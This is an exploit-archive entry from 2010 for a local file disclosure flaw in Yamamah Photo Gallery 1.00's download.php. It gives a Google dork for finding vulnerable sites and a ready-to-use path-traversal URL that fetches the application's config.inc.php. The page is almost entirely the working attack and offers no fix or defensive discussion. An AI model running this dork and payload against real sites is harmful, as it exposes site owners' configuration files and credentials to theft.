[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Yamamah Photo Gallery 1.00 (download.php) Local File Disclosure Vulnerability
# Published : 2010-06-13
# Author : mat
# Previous Title : Eyeland Studio Inc. SQL Injection Vulnerability
# Next Title : Yamamah Photo Gallery 1.00 SQL Injection Vulnerability (calbums)
|=---------------------------------------------------------------------------=|
Yamamah Photo Gallery 1.00 (download.php) Local File Disclosure Vulnerability
|=---------------------------------------------------------------------------=|
|=------------------------------=[ by mat ]=---------------------------------=|
Google dork: "Powered By : Yamamah Version 1.00"
http://[target]/[path]/themes/default/download.php?download=[File Disclosure]
http://[target]/[path]/themes/default/download.php?download=../../includes/config.inc.php